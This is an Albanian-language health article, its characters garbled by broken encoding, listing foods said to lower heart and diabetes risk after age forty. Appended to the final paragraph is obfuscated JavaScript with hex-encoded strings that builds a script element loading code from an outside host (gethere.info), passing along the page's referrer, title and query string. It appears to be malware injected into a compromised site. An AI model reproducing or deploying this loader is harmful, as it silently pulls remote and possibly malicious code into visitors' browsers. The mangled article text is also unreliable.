f.1105010331827_m

TetA� lloje ushqimi pA�r dekadA�n e katA�rt e tutje

Derisa janA� tA� rinj, njerA�zit zakonisht nuk mendojnA� pA�r atA� se cilin ushqim duhet ta konsumojnA�, sepse trupat i kanA� mjaft tA� fortA� pA�r tA� luftuar me A�do gjA�. MegjithatA�, kur i mbushin 40 vjet fillon tA� ndryshojA� mA�nyra me tA� cilA�n trupi pA�rballet me gjithA�ka qA� hamA�.

Rezultatet e shumA� hulumtimeve shkencore tregojnA� qA� sasia e energjisA� sA� shpenzuar gjatA� pushimit fillon tA� reduktohet kur personi i mbush 30 vjet, me reduktimin shtesA� prej shtatA� pA�r qind pA�r A�do dekadA� tA� re. Kjo do tA� thotA� qA� nA�se vazhdoni tA� hani sikurse kur i keni pasur 20 vjet, do tA� filloni tA� grumbulloni kilogramA� tA� tepA�rt.

Nga dekada e katA�rt e tutje, rreziku nga sA�mundjet kardiovaskulare dhe diabeti fillon tA� shqetA�sojA� shumA� njerA�z. MegjithatA�, ka lloje tA� caktuara tA� ushqimit qA� mund tA� reduktojnA� kA�to rreziqe:

Bollguri i tA�rshA�rA�s redukton nivelin e kolesterinA�s sA� keqe dhe mbron nga arteroskleroza.

Vishnjat mund tA� shA�rbejnA� nA� luftA�n kundA�r disa sA�mundjeve qA� janA� tA� shpeshta nA� vitet e mesme, siA� janA� gihti dhe artriti.

Bademi ndihmon te rregullimi i nivelit tA� sheqerit nA� gjak dhe redukton kolesterinA�n.

Acidet yndyrore omega 3 nA� peshk ndihmojnA� te reduktimi i numrit tA� rrahjeve tA� zemrA�s dhe tensionit tA� gjakut. Po ashtu reduktojnA� rrezikun nga aritmia. Peshqit qA� pA�rmbajnA� mA� sA� shumti acide yndyrore omega 3 janA� salmoni, skumbri, toni, sardelet dhe harenga.

Izoflavonet nA� sojA� reduktojnA� kolesterinA�n, rrisin dendA�si nA� e eshtrave te femrat nA� menopauzA� dhe pA�rmirA�sojnA� fertilitetin te meshkujt.

Domatja ofron mbrojtje nga formimi dhe pA�rhapja e qelizave tA� kancerit, ndA�rsa mbron edhe arteret nga arteroskleroza.

QumA�shti me yndyrA� tA� plotA� ndihmon nA� luftA�n kundA�r humbjes sA� masA�s muskulore tA� lidhur me plakjen, veA�anA�risht pas viteve tA� 50- ta tA� jetA�s.

Mishi i pulA�s A�shtA� burim i shkA�lqyeshA�m i proteinave dhe ndihmon rregullimin e peshA�s dhe ndA�rtimin e masA�s muskulore.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}